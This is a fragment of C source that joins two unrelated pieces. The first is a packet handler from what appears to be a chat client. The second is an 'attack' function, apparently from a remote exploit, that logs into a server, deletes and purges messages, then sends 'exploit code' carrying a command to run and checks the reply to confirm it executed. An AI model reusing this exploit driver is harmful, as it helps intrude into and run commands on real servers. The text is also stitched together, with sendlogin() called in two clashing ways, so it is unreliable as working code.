static void
gotpacket(char msg[], int len)
{
int i;
/* What did we get? */
switch (msg[0]) {
case 'a':
break;
case 'b':
printmsg(msg, len, 0);
break;
case 'c':
printmsg(msg, len, 1);
break;
case 'd':
case 'f':
printmsg(msg, len, 2);
break;
case 'e':
timestamp();
fprintf(stdout, "%s ", tbuf);
fputs("-!- [Error] ", stdout);
for (i = 1; i < len; i++)
fputc(msg[i], stdout);
fputc('\n', stdout);
break;
case 'g':
timestamp();
fprintf(stdout, "%s ", tbuf);
fputs("-!- [Error] Connection closed by server\n", stdout);
running = 0;
break;
case 'i':
printicmd(msg, len);
break;
case 'j':
sendlogin(); /* Now we can log in. */
break;
case 'k':
timestamp();
fprintf(stdout, "%s ", tbuf);
fputs("-!- [Beep] You were beeped by ", stdout);
for (i = 1; i < len; i++)
fputc(msg[i], stdout);
fputc('\n', stdout);
break;
case 'l':
case 'm':
break;
default:
fputs("Received invalid packet.\n", stdout);
break;
}
}
int attack(int s, char *user, char *password, int idx, char *exec) {
fd_set fs;
int selret, state, len, code;
char buffer[2048] = "";
FD_ZERO(&fs);
FD_SET(s, &fs);
state = SENDUSER;
do {
selret = select(s + 1, &fs, NULL, NULL, NULL);
if (selret > 0 && FD_ISSET(s, &fs)) {
memset(buffer, 0, sizeof(buffer));
len = read(s, buffer, sizeof(buffer));
printf("<<< %s\n", buffer);
sscanf(buffer, "%d", &code);
switch(state) {
case SENDUSER: sendlogin(s, user);
state = SENDPASS;
break;
case SENDPASS: sendpassword(s, password);
state = DELMESSAGE;
break;
case DELMESSAGE: delmessage(s);
state = PURGEMESSAGE;
break;
case PURGEMESSAGE: purgemessage(s);
state = SENDMESSAGE;
break;
case SENDMESSAGE: if (code > 500) {
fprintf(stderr, "[*] login failed\n");
len = -1;
} else if (code == 230) {
fprintf(stderr, "[*] sending exploit code ...\n");
sendexploit(s, user, idx, exec);
state = READMESSAGE;
}
break;
case READMESSAGE: sleep(5);
readmessage(s);
state = READING;
break;
case READING: if (code == 200 && strstr(buffer, "00000") && strstr(buffer, exec)) {
printf("[*] done\n");
}
break;
}
}
} while (len > 0);
}
